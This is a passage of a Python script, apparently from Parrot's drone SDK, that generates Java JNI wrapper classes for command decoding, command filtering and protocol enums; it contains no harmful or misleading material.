ARCapitalize (format_cmd_name(cmd)) + 'Listener(' + interfaceVar (ftr, cmd) + '_PARAM);\n') jfile.write (' }\n') jfile.write ('\n') jfile.write ('\n') jfile.write ('\n') jfile.write (' private native String nativeToString (long jpdata, int jdataSize);\n') jfile.write (' private static native String nativeStaticToString (long jpdata, int jdataSize);\n') jfile.write ('\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: jfile.write (' private native int nativeSet' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (long pdata, int dataTotalLength') for arg in cmd.args: if isinstance (arg.argType, ArEnum): jfile.write (', int ' + arg.name) elif isinstance(arg.argType, ArMultiSetting): for multiset_msg in arg.argType.msgs: jfile.write (', int '+ARCapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+'IsSet') for multiset_msg_arg in multiset_msg.args: jfile.write (', ' + xmlToJava (LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) + ' '+ARUncapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+ARCapitalize(multiset_msg_arg.name)+'') else: jfile.write (', ' + xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' ' + arg.name) jfile.write (');\n') jfile.write ('\n') jfile.write ('\n') jfile.write ('}\n') jfile.close () jfile = open (paths.JNI_DECODER_JFILE, 'w') jfile.write (LICENCE_HEADER) jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n') jfile.write ('import com.parrot.arsdk.arsal.ARSALPrint;\n') jfile.write ('\n') jfile.write ('/**\n') jfile.write (' * Java representation of a C ' + JNIDecoderClassName + ' object.<br>\n') jfile.write (' * This class allow to decode ARCommands.\n') jfile.write (' * @author Parrot (c) 2016\n') jfile.write (' */\n') jfile.write ('public class ' + JNIDecoderClassName + ' {\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Storage of the C Pointer\n') jfile.write (' */\n') jfile.write (' protected long pointer;\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Check validity before all native calls\n') jfile.write (' */\n') jfile.write (' protected boolean valid;\n') jfile.write ('\n') jfile.write ('/**\n') jfile.write (' * Dummy throwable to keep the constructors call stack\n') jfile.write (' */\n') jfile.write ('\n') jfile.write (' private Throwable constructorCallStack;\n') jfile.write ('\n') jfile.write (' protected static final String TAG = "'+JNIDecoderClassName+'";\n') jfile.write ('\n') jfile.write (' private static native void nativeStaticInit ();\n') jfile.write (' static\n') jfile.write (' {\n') jfile.write (' nativeStaticInit();\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Creates a new, ' + JNIDecoderClassName + '\n') jfile.write (' */\n') jfile.write (' public ' + JNIDecoderClassName + ' () {\n') jfile.write ('\n') jfile.write (' this.pointer = nativeNewDecoder ();\n') jfile.write (' this.valid = false;\n') jfile.write (' if (this.pointer != 0) {\n') jfile.write (' this.valid = true;\n') jfile.write (' }\n') jfile.write (' this.constructorCallStack = new Throwable();\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /* ********** */\n') jfile.write (' /* DESTRUCTOR */\n') jfile.write (' /* ********** */\n') jfile.write (' protected void finalize () throws Throwable {\n') jfile.write (' try {\n') jfile.write (' if (valid) {\n') jfile.write (' ARSALPrint.w (TAG, this + ": Finalize error -> dispose () was not called !", this.constructorCallStack);\n') jfile.write (' dispose ();\n') jfile.write (' }\n') jfile.write (' }\n') jfile.write (' finally {\n') jfile.write (' super.finalize ();\n') jfile.write (' }\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /* ************** */\n') jfile.write (' /* IMPLEMENTATION */\n') jfile.write (' /* ************** */\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Checks the object validity\n') jfile.write (' * @return <code>true</code> if the object is valid (buffer properly alloc and usable)<br><code>false</code> if the object is invalid (alloc error, disposed object)\n') jfile.write (' */\n') jfile.write (' public boolean isValid () {\n') jfile.write (' return valid;\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Marks a native data as unused (so C-allocated memory can be freed)<br>\n') jfile.write (' * A disposed data is marked as invalid\n') jfile.write (' */\n') jfile.write (' public void dispose () {\n') jfile.write (' if (valid)\n') jfile.write (' nativeDeleteDecoder (pointer);\n') jfile.write (' this.valid = false;\n') jfile.write (' this.pointer = 0;\n') jfile.write (' }\n') jfile.write (' /**\n') jfile.write (' * Decodes a ' + JNIClassName + ', calling commands listeners<br>\n') jfile.write (' * If a listener was set for the Class/Command contained within the ' + JNIDecoderClassName + ',\n') jfile.write (' * its <code>onClassCommandUpdate(...)</code> function will be called in the current thread.\n') jfile.write (' * @param command command to decode.\n') jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' error code\n') jfile.write (' */\n') jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' decode ('+JNIClassName+' command) {\n') jfile.write (' ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR', True) + ';\n') jfile.write (' if ((!valid) || (command == null) || (!command.isValid())) {\n') jfile.write (' return err;\n') jfile.write (' }\n') jfile.write (' int errInt = nativeDecode (pointer, command.getData(), command.getDataSize());\n') jfile.write (' if (' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt) != null) {\n') jfile.write (' err = ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt);\n') jfile.write (' }\n') jfile.write (' return err;\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Decodes a command calling commands listeners<br>\n') jfile.write (' * If a listener was set for the Class/Command contained within the ' + JNIDecoderClassName + ',\n') jfile.write (' * its <code>onClassCommandUpdate(...)</code> function will be called in the current thread.\n') jfile.write (' * @param command command to decode.\n') jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' error code\n') jfile.write (' */\n') jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' decode (long data, int size) {\n') jfile.write (' ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR', True) + ';\n') jfile.write (' if (!valid) {\n') jfile.write (' return err;\n') jfile.write (' }\n') jfile.write (' int errInt = nativeDecode (pointer, data, size);\n') jfile.write (' if (' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt) != null) {\n') jfile.write (' err = ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt);\n') jfile.write (' }\n') jfile.write (' return err;\n') jfile.write (' }\n') jfile.write ('\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: jfile.write (' private ' + interfaceName (ftr, cmd) + ' ' + interfaceVar (ftr, cmd) + ';\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Set the listener for the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code><br>\n') jfile.write (' * Listeners are static to the class, and are not to be set on every object\n') #~ jfile.write (' * @param ' + interfaceVar (ftr, cmd) + '_PARAM New listener for the command\n')nativeDecode jfile.write (' */\n') jfile.write (' public void set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Listener (' + interfaceName (ftr, cmd) + ' ' + interfaceVar (ftr, cmd) + '_PARAM) {\n') jfile.write (' ' + interfaceVar (ftr, cmd) + ' = ' + interfaceVar (ftr, cmd) + '_PARAM;\n') jfile.write (' }\n') jfile.write ('\n') jfile.write ('\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: jfile.write (' void ' + javaCbName (ftr, cmd) + ' (') first = True for arg in cmd.args: if first: first = False else: jfile.write (', ') jfile.write (xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' ' + arg.name) jfile.write (') {\n') jfile.write (' if(' + interfaceVar (ftr, cmd) + ' != null) {\n') jfile.write (' ' + interfaceVar (ftr, cmd) + '.' + javaCbName (ftr, cmd) + ' (') first = True for arg in cmd.args: if first: first = False else: jfile.write (', ') jfile.write (arg.name) jfile.write (');\n') jfile.write (' }\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /* **************** */\n') jfile.write (' /* NATIVE FUNCTIONS */\n') jfile.write (' /* **************** */\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Memory allocation in native memory space<br>\n') jfile.write (' * Allocates a decoder and return its C-Pointer\n') jfile.write (' * @return C-Pointer on the decoder, or 0 (C-NULL) if the alloc failed\n') jfile.write (' */\n') jfile.write (' private native long nativeNewDecoder ();\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Memory release in native memory space<br>\n') jfile.write (' * Frees a decoder from its C-Pointer<br>\n') jfile.write (' * This call is needed because JVM do not know about native memory allocs\n') jfile.write (' * @param decoder C-Pointer on the decoder to free\n') jfile.write (' */\n') jfile.write (' private native void nativeDeleteDecoder (long decoder);\n') jfile.write ('\n') jfile.write (' private native int nativeDecode (long jdecoder, long jpdata, int jdataSize);\n') jfile.write ('\n') jfile.write ('}\n') jfile.write ('\n') jfile.close () jfile = open (paths.JNI_FILTER_JFILE, 'w') jfile.write (LICENCE_HEADER) jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n') jfile.write ('\n') jfile.write ('import com.parrot.arsdk.arsal.ARSALPrint;\n') jfile.write ('\n') jfile.write ('/**\n') jfile.write (' * Java implementation of a C ' + JNIFilterClassName + ' object.<br>\n') jfile.write (' * @author Parrot (c) 2014\n') jfile.write (' */\n') jfile.write ('public class ' + JNIFilterClassName + '\n') jfile.write ('{\n') jfile.write (' private long cFilter;\n') jfile.write (' private boolean valid;\n') jfile.write (' private static final String TAG = ' + JNIFilterClassName + '.class.getSimpleName();\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Creates a new ' + JNIFilterClassName + ' which allows all commands.\n') jfile.write (' */\n') jfile.write (' public ' + JNIFilterClassName + ' () {\n') jfile.write (' this(ARCOMMANDS_FILTER_STATUS_ENUM.ARCOMMANDS_FILTER_STATUS_ALLOWED);\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Creates a new ' + JNIFilterClassName + ' with the given default behavior.\n') jfile.write (' * @param behavior The default behavior of the filter.\n') jfile.write (' * @warning Only ALLOWED and BLOCK are allowed as default behavior. Providing any other value will create an invalid object.\n') jfile.write (' */\n') jfile.write (' public ' + JNIFilterClassName + ' (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n') jfile.write (' this.cFilter = nativeNewFilter (behavior.getValue());\n') jfile.write (' this.valid = (this.cFilter != 0);\n') jfile.write (' if (! this.valid) {\n') jfile.write (' dispose();\n') jfile.write (' }\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Checks the object validity.\n') jfile.write (' * @return <code>true</code> if the object is valid<br><code>false</code> if the object is invalid.\n') jfile.write (' */\n') jfile.write (' public boolean isValid () {\n') jfile.write (' return valid;\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Marks a ' + JNIFilterClassName + ' as unused (so C-allocated memory can be freed)<br>\n') jfile.write (' * A disposed ' + JNIFilterClassName + ' is marked as invalid.\n') jfile.write (' */\n') jfile.write (' public void dispose () {\n') jfile.write (' if (valid) {\n') jfile.write (' nativeDeleteFilter (cFilter);\n') jfile.write (' }\n') jfile.write (' this.valid = false;\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Gets the native pointer for this filter\n') jfile.write (' * @return The pointer.\n') jfile.write (' */\n') jfile.write (' public long getFilter () {\n') jfile.write (' return cFilter;\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' protected void finalize () throws Throwable {\n') jfile.write (' try {\n') jfile.write (' if (valid) {\n') jfile.write (' ARSALPrint.e (TAG, this + ": Finalize error -> dispose () was not called !");\n') jfile.write (' dispose ();\n') jfile.write (' }\n') jfile.write (' }\n') jfile.write (' finally {\n') jfile.write (' super.finalize ();\n') jfile.write (' }\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' /**\n') jfile.write (' * Filters a command.<br>\n') jfile.write (' * This function returns the filter behavior for the given ' + JNIClassName + '.<br>\n') jfile.write (' * @param command The command to be filtered.\n') jfile.write (' * @return The filter status.\n') jfile.write (' */\n') jfile.write (' public ARCOMMANDS_FILTER_STATUS_ENUM filterCommand (' + JNIClassName + ' command) {\n') jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_STATUS_ENUM.ARCOMMANDS_FILTER_STATUS_ERROR; }\n') jfile.write (' int cStatus = nativeFilterCommand (cFilter, command.getData(), command.getDataSize());\n') jfile.write (' return ARCOMMANDS_FILTER_STATUS_ENUM.getFromValue(cStatus);\n') jfile.write (' }\n') jfile.write ('\n') jfile.write (' private native long nativeNewFilter (int behavior);\n') jfile.write (' private native void nativeDeleteFilter (long cFilter);\n') jfile.write (' private native int nativeFilterCommand (long cFilter, long command, int len);\n') jfile.write ('\n') for ftr in allFeatures: jfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n') jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (long cFilter, int behavior);\n') jfile.write (' /**\n') jfile.write (' * Sets the behavior for all commands ' + ARCapitalize(get_ftr_old_name(ftr)) + '.XXX.XXX.\n') jfile.write (' * @param behavior The behavior to set.\n') jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n') jfile.write (' */\n') jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n') jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n') jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (this.cFilter, behavior.getValue());\n') jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n') jfile.write (' }\n') jfile.write ('\n') if ftr.classes: # projetc only for cl in ftr.classes: jfile.write (' // - Class ' + cl.name + '\n') jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (long cFilter, int behavior);\n') jfile.write (' /**\n') jfile.write (' * Sets the behavior for all commands ' + ARCapitalize(get_ftr_old_name(ftr)) + '.' + ARCapitalize(cl.name) + '.XXX.\n') jfile.write (' * @param behavior The behavior to set.\n') jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n') jfile.write (' */\n') jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n') jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n') jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (this.cFilter, behavior.getValue());\n') jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n') jfile.write (' }\n') jfile.write ('\n') for cmd in cl.cmds: jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize(cmd.name) + 'Behavior (long cFilter, int behavior);\n') jfile.write (' /**\n') jfile.write (' * Sets the behavior for the command ' + ARCapitalize(get_ftr_old_name(ftr)) + '.' + ARCapitalize(cl.name) + '.' + ARCapitalize(cmd.name) + '.\n') jfile.write (' * @param behavior The behavior to set.\n') jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n') jfile.write (' */\n') jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize(cmd.name) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n') jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n') jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize(cmd.name) + 'Behavior (this.cFilter, behavior.getValue());\n') jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n') jfile.write (' }\n') jfile.write ('\n') jfile.write ('\n') else: for cmd in ftr.cmds + ftr.evts: jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cmd.name) + 'Behavior (long cFilter, int behavior);\n') jfile.write (' /**\n') jfile.write (' * Sets the behavior for the command ' + ARCapitalize(get_ftr_old_name(ftr)) + '.' + ARCapitalize(cmd.name) + '.\n') jfile.write (' * @param behavior The behavior to set.\n') jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n') jfile.write (' */\n') jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cmd.name) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n') jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n') jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cmd.name) + 'Behavior (this.cFilter, behavior.getValue());\n') jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n') jfile.write (' }\n') jfile.write ('\n') jfile.write ('\n') jfile.write ('}\n') jfile.close () # Generate java enums type for ftr in allFeatures: for enum in ftr.enums: oldEnumValFrm = False if ftr.classes == None else True CLASS_NAME = ARJavaEnumType (LIB_MODULE, get_ftr_old_name(ftr), enum.name) JFILE_NAME = paths.JNIJ_OUT_DIR + CLASS_NAME + '.java' UNKNOWN_VALUE = ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, 'UNKNOWN') if ftr.classes == None else 'e'+AREnumValue(LIB_MODULE, get_ftr_old_name(ftr), enum.name,'UNKNOWN_ENUM_VALUE') jfile = open(JFILE_NAME, 'w') jfile.write(LICENCE_HEADER) jfile.write('\n') jfile.write('package ' + JNI_PACKAGE_NAME + ';\n') jfile.write('\n') jfile.write('import java.util.HashMap;\n') jfile.write('\n') jfile.write('/**\n') jfile.write(' * Java copy of the ' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), enum.name) + ' enum\n') jfile.write(' */\n') jfile.write('public enum ' + CLASS_NAME + ' {\n') jfile.write(' /** Dummy value for all unknown cases */\n') jfile.write(' ' + UNKNOWN_VALUE + ' (Integer.MIN_VALUE, "Dummy value for all unknown cases"),\n') previousVal = -1 for eVal in enum.values: val = eVal.value if eVal.value is not None else previousVal +1 previousVal = int(val) jfile.write(' ') if eVal.doc: jfile.write('/** '+eVal.doc.replace('\n', ' ')+' */\n ') if eVal.doc: jfile.write(ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name, oldEnumValFrm)+ ' (' + str(val)+ ', "'+eVal.doc.replace('\n', ' ')+'")') else: jfile.write(ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name, oldEnumValFrm) + ' (' + str(val) + ')') #If it is the last value of a feature enum. if ftr.classes == None and eVal == enum.values[-1]: jfile.write(';\n') else: jfile.write(',\n') # Add MAX value only if it is an old enum. if ftr.classes: MAX_VALUE = ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, 'MAX', oldEnumValFrm) jfile.write(' ' + MAX_VALUE + ' ('+ str(previousVal + 1) +');\n') jfile.write('\n') jfile.write('\n') jfile.write(' private final int value;\n') jfile.write(' private final String comment;\n'); jfile.write(' static HashMap<Integer, ' + CLASS_NAME + '> valuesList;\n') jfile.write('\n') jfile.write(' ' + CLASS_NAME + ' (int value) {\n') jfile.write(' this.value = value;\n') jfile.write(' this.comment = null;\n') jfile.write(' }\n') jfile.write('\n') jfile.write(' ' + CLASS_NAME + ' (int value, String comment) {\n') jfile.write(' this.value = value;\n') jfile.write(' this.comment = comment;\n') jfile.write(' }\n') jfile.write('\n') jfile.write(' /**\n') jfile.write(' * Gets the int value of the enum\n') jfile.write(' * @return int value of the enum\n') jfile.write(' */\n') jfile.write(' public int getValue () {\n') jfile.write(' return value;\n') jfile.write(' }\n') jfile.write('\n') jfile.write(' /**\n') jfile.write(' * Gets the ' + CLASS_NAME + ' instance from a C enum value\n') jfile.write(' * @param value C value of the enum\n') jfile.write(' * @return The ' + CLASS_NAME + ' instance, or null if the C enum value was not valid\n') jfile.write(' */\n') jfile.write(' public static ' + CLASS_NAME + ' getFromValue (int value) {\n') jfile.write(' if (null == valuesList) {\n') jfile.write(' ' + CLASS_NAME + ' [] valuesArray = ' + CLASS_NAME + '.values ();\n') jfile.write(' valuesList = new HashMap<Integer, ' + CLASS_NAME + '> (valuesArray.length);\n') jfile.write(' for (' + CLASS_NAME + ' entry : valuesArray) {\n') jfile.write(' valuesList.put (entry.getValue (), entry);\n') jfile.write(' }\n') jfile.write(' }\n') jfile.write(' ' + CLASS_NAME + ' retVal = valuesList.get (value);\n') jfile.write(' if (retVal == null) {\n') jfile.write(' retVal = ' + UNKNOWN_VALUE + ';\n') jfile.write(' }\n') jfile.write(' return retVal;') jfile.write(' }\n') jfile.write('\n') jfile.write(' /**\n') jfile.write(' * Returns the enum comment as a description string\n') jfile.write(' * @return The enum description\n') jfile.write(' */\n') jfile.write(' public String toString () {\n') jfile.write(' if (this.comment != null) {\n') jfile.write(' return this.comment;\n') jfile.write(' }\n') jfile.write(' return super.toString ();\n') jfile.write(' }\n') jfile.write('}\n') jfile.close() for multiset in ftr.multisets: oldEnumValFrm = False if ftr.classes == None else True CLASS_NAME = ARJavaMultiSetType (LIB_MODULE, get_ftr_old_name(ftr), multiset.name) JFILE_NAME = paths.JNIJ_OUT_DIR + CLASS_NAME + '.java' jfile = open(JFILE_NAME, 'w') jfile.write(LICENCE_HEADER) jfile.write('\n') jfile.write('package ' + JNI_PACKAGE_NAME + ';\n') jfile.write('\n') jfile.write('/**\n') jfile.write(' * Java copy of the ' + ARJavaMultiSetType (LIB_MODULE, get_ftr_old_name(ftr), enum.name) + '\n') jfile.write(' */\n') jfile.write('public class ' + CLASS_NAME + ' {\n') jfile.write('\n') for multiset_msg in multiset.msgs: jfile.write(' private static class ' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' {\n') jfile.write(' public int isSet;\n') for multiset_msg_arg in multiset_msg.args: jfile.write(' public '+ xmlToJava(LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) +' ' + multiset_msg_arg.name + ';\n') jfile.write(' }\n') jfile.write('\n') jfile.write(' public ' + CLASS_NAME + ' () {\n') jfile.write(' }\n') jfile.write('\n') for multiset_msg in multiset.msgs: jfile.write(' private final ' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' = new ' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '();\n') jfile.write('\n') for multiset_msg in multiset.msgs: jfile.write(' public void set' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' (') isFirst = True for multiset_msg_arg in multiset_msg.args: if not isFirst: jfile.write(', ') isFirst = False jfile.write( xmlToJava(LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) +' ' + multiset_msg_arg.name ) jfile.write(') {\n') jfile.write( ' _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.isSet = 1;\n') for multiset_msg_arg in multiset_msg.args: jfile.write( ' _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.'+multiset_msg_arg.name+' = ' + multiset_msg_arg.name+';\n' ) jfile.write(' }\n') jfile.write('\n') for multiset_msg in multiset.msgs: jfile.write(' public int get' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + 'IsSet () {\n') jfile.write( ' return _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.isSet;\n') jfile.write(' }\n') jfile.write('\n') for multiset_msg_arg in multiset_msg.args: jfile.write(' public '+ xmlToJava(LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) +' get' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ARCapitalize(multiset_msg_arg.name) +' () {\n') jfile.write( ' return _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.'+multiset_msg_arg.name+';\n') jfile.write(' }\n') jfile.write('\n') jfile.write('}\n') jfile.close() # Generate java enums #enumDecErr = ArEnum(DEC_SUBMODULE+'_'+DEC_ERR_ENAME, 'Error codes for ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' function') enumDecErr = ArEnum(DEC_ERR_ENAME, 'Error codes for ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' function') enumDecErr.values.append(ArEnumValue('OK', 0, 'No error occured')) enumDecErr.values.append(ArEnumValue('NO_CALLBACK', 1, 'No error, but no callback was set (so the call had no effect)')) enumDecErr.values.append(ArEnumValue('UNKNOWN_COMMAND', 2, 'The command buffer contained an unknown command')) enumDecErr.values.append(ArEnumValue('NOT_ENOUGH_DATA', 3, 'The command buffer did not contain enough data for the specified command')) enumDecErr.values.append(ArEnumValue('NOT_ENOUGH_SPACE', 4, 'The string buffer was not big enough for the command description')) enumDecErr.values.append(ArEnumValue('ERROR', 5, 'Any other error')) #enumFilterErr = ArEnum(FIL_SUBMODULE+'_'+FIL_ERROR_ENAME, 'Error code for ARCOMMANDS_Filter functions.') enumFilterErr = ArEnum(FIL_ERROR_ENAME, 'Error code for ARCOMMANDS_Filter functions.') enumFilterErr.values.append(ArEnumValue('OK', 0,'No error.')) enumFilterErr.values.append(ArEnumValue('ALLOC', 1,'Memory allocation error.')) enumFilterErr.values.append(ArEnumValue('BAD_STATUS', 2,'The given status is not a valid status.')) enumFilterErr.values.append(ArEnumValue('BAD_FILTER', 3,'The given filter is not a valid filter.')) enumFilterErr.values.append(ArEnumValue('BAD_BUFFER', 4,'The given buffer is not a valid buffer.')) enumFilterErr.values.append(ArEnumValue('OTHER', 5,'Any other error.')) #enumFilterStatus = ArEnum(FIL_SUBMODULE+'_'+FIL_STATUS_ENAME,'Status code for ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' function') enumFilterStatus = ArEnum(FIL_STATUS_ENAME,'Status code for ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' function') enumFilterStatus.values.append(ArEnumValue('ALLOWED', 0,'The command should pass the filter')) enumFilterStatus.values.append(ArEnumValue('BLOCKED', 1,'The command should not pass the filter')) enumFilterStatus.values.append(ArEnumValue('UNKNOWN', 2,'Unknown command. The command was possibly added in a newer version of libARCommands, or is an invalid command.')) enumFilterStatus.values.append(ArEnumValue('ERROR', 3, 'The filtering of the command failed.')) #enumGenErr = ArEnum(GEN_SUBMODULE+'_'+GEN_ERR_ENAME,'Error codes for ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'GenerateCommand') + ' functions') enumGenErr = ArEnum(GEN_ERR_ENAME,'Error codes for ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'GenerateCommand') + ' functions') enumGenErr.values.append(ArEnumValue( 'OK', 0,'No error occured')) enumGenErr.values.append(ArEnumValue('BAD_ARGS', 1, 'At least one of the arguments is invalid')) enumGenErr.values.append(ArEnumValue('NOT_ENOUGH_SPACE', 2, 'The given output buffer was not large enough for the command')) enumGenErr.values.append(ArEnumValue('ERROR', 3, 'Any other error')) enums = [enumDecErr, enumFilterErr, enumFilterStatus, enumGenErr] subModules = [DEC_SUBMODULE, FIL_SUBMODULE, FIL_SUBMODULE, GEN_SUBMODULE] for enum in enums: submodule = subModules[enums.index(enum)] #CLASS_NAME = LIB_MODULE.upper () + submodule.upper() + '_' + enum.name.upper () + '_ENUM' CLASS_NAME = ARJavaEnumType (LIB_MODULE, submodule, enum.name) JFILE_NAME = paths.JNIJ_OUT_DIR + CLASS_NAME + '.java' UNKNOWN_VALUE = 'e'+ARJavaEnumValDef(LIB_MODULE, submodule, enum.name, 'UNKNOWN_ENUM_VALUE', True) jfile = open(JFILE_NAME, 'w') jfile.write(LICENCE_HEADER) jfile.write('\n') jfile.write('package ' + JNI_PACKAGE_NAME + ';\n') jfile.write('\n') jfile.write('import java.util.HashMap;\n') jfile.write('\n') jfile.write('/**\n') jfile.write(' * Java copy of the ' + AREnumName (LIB_MODULE, submodule, enum.name) + ' enum\n') jfile.write(' 